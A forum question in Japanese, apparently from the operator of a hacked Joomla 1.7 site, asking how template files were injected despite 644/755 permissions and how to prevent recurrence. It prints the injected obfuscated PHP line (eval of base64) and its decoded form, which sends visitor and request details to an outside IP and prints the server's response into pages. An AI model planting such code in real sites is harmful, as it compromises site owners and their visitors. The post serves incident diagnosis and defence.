今日ハッキングされたJoomla1.7サイトを運営しています。以下のスクリプトはハックを行いました。
eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));
index.php
上記の行は、テンプレートフォルダの私のファイルに挿入されました。フォルダにあったすべてのテンプレートには、上記のコードが含まれていました。各ファイルで、それは数回繰り返されました。
コードをデコードすると、出力されます
print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI']));
スクリプトを削除しましたが、サイトはたまたま正常に機能しています。サイトがまったく読み込まれなかったことを除いて、スクリプトは何も悪いことをしませんでした。
私の問題は、ファイルのアクセス許可を644に設定し、フォルダーのアクセス許可を755に設定した場合でも、どうしてこれが発生するのでしょうか。
問題の原因をどのように特定できますか?将来これが起こらないようにするには、どのような手順を踏む必要がありますか?
アップデート
このフォーラム投稿アシスタント/FPAは非常に役立ちます